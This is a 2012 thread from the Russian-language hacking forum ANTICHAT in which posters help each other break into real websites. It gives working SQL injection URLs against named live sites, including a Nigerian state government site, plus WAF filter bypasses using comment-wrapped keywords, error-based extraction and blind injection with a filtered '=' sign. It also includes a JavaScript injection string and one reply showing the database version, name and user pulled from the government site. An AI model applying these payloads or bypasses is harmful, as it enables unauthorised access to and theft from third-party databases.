ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
19.02.2012, 20:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
5997
Репутация:
21
|
|
В зависимости от того, что делает функция AddData, инъектировать можно, например, }],1);UNBS[221122].rnm='something';//
|
|
|
|
19.02.2012, 20:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
179355
Репутация:
53
|
|
Сообщение от SecondLife
SecondLife said:
В зависимости от того, что делает функция
AddData
, инъектировать можно, например,
}],1);alert(/xss/);//
мне нельзя прерывать тот код. да вставить алерты как раз плюнуть. мне интересно, можно ли обратиться к коду выше, изменить одну переменную не прерывая adddata. так как я adddata - динамично изменяется и строк так 50 занимает)
|
|
|
|
19.02.2012, 21:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
5997
Репутация:
21
|
|
Функция AddData будет выполнена, ее вызов мы отменить не можем. Можем только косвенно влиять на результат ее работы, манипулируя передваваемым объектом.
Я подправил предыдущий пост, там вместо алерта присвоение идет.
Впринципе, можно это присвоение сделать и иначе:
Код:
Code:
,tmp:UNBS[221122].rnm='something'
|
|
|
|
19.02.2012, 21:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
7749
Репутация:
0
|
|
Столкнулся с очередным инжектом в MSSQL.При подборе через order by мне выдало 12 полей.ок.Делаю union (без all) по 12 null-полям,ошибка.Решил проверить,что на это скажет панголин - он отослал запрос union all select + 13 null-ов.Работает.Теперь вопрос,почему не работает у меня...
ЗЫ: Возможности глянуть сам запрос нет.
|
|
|
|
19.02.2012, 22:43
|
|
Новичок
Регистрация: 25.01.2009
Сообщений: 1
Провел на форуме:
4954
Репутация:
0
|
|
Сообщение от SecondLife
SecondLife said:
http://www.dob.ee/listings.php?category=-333)+order+by+1%23
это понятно... только вывод не сделать никак, 406 ошибку выдает... я так понимаю в браузере дело... каким лучше пользоваться?
...или я чего-то недогоняю... все методы пробовал... и error based не катит...
|
|
|
20.02.2012, 02:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
23576
Репутация:
-1
|
|
Сообщение от Qwert321
Qwert321 said:
это понятно... только вывод не сделать никак, 406 ошибку выдает... я так понимаю в браузере дело... каким лучше пользоваться?
...или я чего-то недогоняю... все методы пробовал... и error based не катит...
вообщем там WAF, и два запроса к базе:
1. http://www.dob.ee/listings.php?category=399)+order+by+2%23 - false, true
2.http://www.dob.ee/listings.php?category=399)+order+by+89%23 - false, false (в моей практике впервые столько колонок (88))
+ еще фильтрация union, и =, походу но может и еще на что то, можно пробывать так но чет не пляшет нифига:
Код:
Code:
http://www.dob.ee/listings.php?category=333)+/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88%23
походу просто нет принтабельных полей а это значит - blind,
но как раскрутить слепую с фильтром знака "=" я незнаю((
|
|
|
|
20.02.2012, 02:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от Qwert321
Qwert321 said:
это понятно... только вывод не сделать никак, 406 ошибку выдает... я так понимаю в браузере дело... каким лучше пользоваться?
...или я чего-то недогоняю... все методы пробовал... и error based не катит...
http://www.dob.ee/listings.php
?category=3)and(select+1+from(select+/*!count(*)*/,concat((select+schema_name+from+information_schem a.schemata+limit+1,1),floor(Rand(0)*2))a+from+info rmation_schema.tables+group+by+a)b)%23
Cтоит фильтр на count, обходится как у меня в линке.
Upd:
Сообщение от pirat0
pirat0 said:
походу просто нет принтабельных полей а это значит - blind,
но как раскрутить слепую с фильтром знака "=" я незнаю((
так же как и обычно. Только правильностью будет false
50 <> 50 = false. То что надо.
|
|
|
|
20.02.2012, 02:36
|
|
Новичок
Регистрация: 25.01.2009
Сообщений: 1
Провел на форуме:
4954
Репутация:
0
|
|
Сообщение от pirat0
pirat0 said:
вообщем там WAF, и два запроса к базе
спасибо...
Сообщение от Melfis
Melfis said:
Cтоит фильтр на count, обходится как у меня в линке.
спасибо всем ...разобрался...
|
|
|
|
20.02.2012, 19:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
35174
Репутация:
-6
|
|
Код:
Code:
http://www.jigawastate.gov.ng/contentpage.php?id=-255'+/!*group*/+by+/!*concat*/(left(version(),64),floor(rand(0)*2))+having+min(0)+--+
I tried most injections but do not work on it. |
|
|
|
20.02.2012, 20:06
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
Сообщение от lightangel
lightangel said:
Код:
Code:
http://www.jigawastate.gov.ng/contentpage.php?id=-255'+/!*group*/+by+/!*concat*/(left(version(),64),floor(rand(0)*2))+having+min(0)+--+
I tried most injections but do not work on it. http://www.jigawastate.gov.ng/contentpage.php?id=-255'+/*!union+select*/+1,concat_ws(0x3a,version(),database(),user()),3,4 ,5,6,7,8,9,0+--+
5.1.56:jigawa_jigawa:jigawa@localhost
use google to translate this: КУРИ МАНУАЛЫ БЛЕАТЬ !11
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид